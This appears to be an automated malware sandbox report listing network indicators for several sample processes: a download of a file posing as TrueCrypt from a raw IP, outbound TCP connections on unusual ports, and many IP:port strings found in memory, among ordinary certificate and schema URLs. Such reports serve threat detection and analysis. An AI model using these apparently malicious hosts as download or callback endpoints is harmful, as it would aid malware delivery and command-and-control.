Source: global traffic	HTTP traffic detected: GET /TrueCrypt_ypAWBs.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 194.49.94.120

Source: Joe Sandbox View	ASN Name: EQUEST-ASNL EQUEST-ASNL
Source: Joe Sandbox View	ASN Name: EQUEST-ASNL EQUEST-ASNL

Source: Joe Sandbox View	IP Address: 194.49.94.210 194.49.94.210
Source: Joe Sandbox View	IP Address: 194.49.94.152 194.49.94.152

Source: global traffic	TCP traffic: 192.168.2.4:49729 -> 194.49.94.152:50500
Source: global traffic	TCP traffic: 192.168.2.4:49738 -> 194.169.175.235:42691
Source: global traffic	TCP traffic: 192.168.2.4:49756 -> 185.86.150.58:9001
Source: global traffic	TCP traffic: 192.168.2.4:49759 -> 144.91.125.239:9001
Source: global traffic	TCP traffic: 192.168.2.4:49762 -> 194.49.94.80:42359
Source: global traffic	TCP traffic: 192.168.2.4:49766 -> 85.214.85.187:9090
Source: global traffic	TCP traffic: 192.168.2.4:49776 -> 188.241.240.27:8080
Source: global traffic	TCP traffic: 192.168.2.4:49794 -> 195.10.205.16:1056
Source: global traffic	TCP traffic: 192.168.2.4:49822 -> 185.217.98.121:8080
Source: global traffic	TCP traffic: 192.168.2.4:49835 -> 52.86.18.77:8080

Source: unknown

Network traffic detected: IP country count 12

Source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://103.226.125.218:80
Source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://107.161.20.142:8080
Source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://154.31.165.232:80
Source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://162.33.178.113:80
Source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://167.71.106.175:80
Source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://168.138.211.88:8099
Source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://18.218.18.183:80
Source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://18.228.80.130:80
Source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.217.98.121:80
Source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.217.98.121:8080
Source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://188.241.240.27:8080
Source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://206.189.109.146:80
Source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://216.250.190.139:80
Source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://216.39.242.18:8080
Source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://217.145.238.175:80
Source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://23.224.102.6:8001
Source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://35.166.49.216:8080
Source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.55.65.93:80
Source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://52.86.18.77:8080
Source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://66.42.56.128:80
Source: 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://85.214.85.187:9090
Source: Tg9kb35.exe, 00000002.00000003.1655339902.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, Tg9kb35.exe, 00000002.00000003.1655167777.000000000489C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2020251955.0000000009B81000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: explorer.exe, 0000000B.00000000.1724220007.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.1721922206.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: Tg9kb35.exe, 00000002.00000003.1655339902.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, Tg9kb35.exe, 00000002.00000003.1655167777.000000000489C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Tg9kb35.exe, 00000002.00000003.1655339902.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, Tg9kb35.exe, 00000002.00000003.1655167777.000000000489C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2020251955.0000000009B81000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Tg9kb35.exe, 00000002.00000003.1655339902.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, Tg9kb35.exe, 00000002.00000003.1655167777.000000000489C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2020251955.0000000009B81000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: explorer.exe, 0000000B.00000003.2020251955.0000000009B81000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: Tg9kb35.exe, 00000002.00000003.1655339902.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, Tg9kb35.exe, 00000002.00000003.1655167777.000000000489C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2020251955.0000000009B81000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: explorer.exe, 0000000B.00000000.1724220007.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.1721922206.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: Tg9kb35.exe, 00000002.00000003.1655339902.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, Tg9kb35.exe, 00000002.00000003.1655167777.000000000489C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Tg9kb35.exe, 00000002.00000003.1655339902.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, Tg9kb35.exe, 00000002.00000003.1655167777.000000000489C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2020251955.0000000009B81000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Tg9kb35.exe, 00000002.00000003.1655167777.000000000489C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2020251955.0000000009B81000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: explorer.exe, 0000000B.00000000.1724220007.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.1721922206.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: Tg9kb35.exe, 00000002.00000003.1655339902.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, Tg9kb35.exe, 00000002.00000003.1655167777.000000000489C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: explorer.exe, 0000000B.00000003.2020251955.0000000009B81000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: 7FE0.exe, 00000011.00000002.2149928041.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.ao
Source: Tg9kb35.exe, 00000002.00000003.1655339902.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, Tg9kb35.exe, 00000002.00000003.1655167777.000000000489C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.1724220007.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.1721922206.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Tg9kb35.exe, 00000002.00000003.1655339902.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, Tg9kb35.exe, 00000002.00000003.1655167777.000000000489C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2020251955.0000000009B81000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: Tg9kb35.exe, 00000002.00000003.1655339902.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, Tg9kb35.exe, 00000002.00000003.1655167777.000000000489C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2020251955.0000000009B81000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: Tg9kb35.exe, 00000002.00000003.1655339902.00000000006EC000.00000004.00000020.00020000.00000000.sdmp, Tg9kb35.exe, 00000002.00000003.1655167777.000000000489C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000003.2020251955.0000000009B81000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: explorer.exe, 0000000B.00000000.1721922206.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 0000000B.00000003.2020251955.0000000009B81000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: 7FE0.exe, 00000011.00000002.2149928041.0000000000ABE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://purl.oen
Source: explorer.exe, 0000000B.00000000.1723245130.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.1722533269.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.1725227083.0000000009B60000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
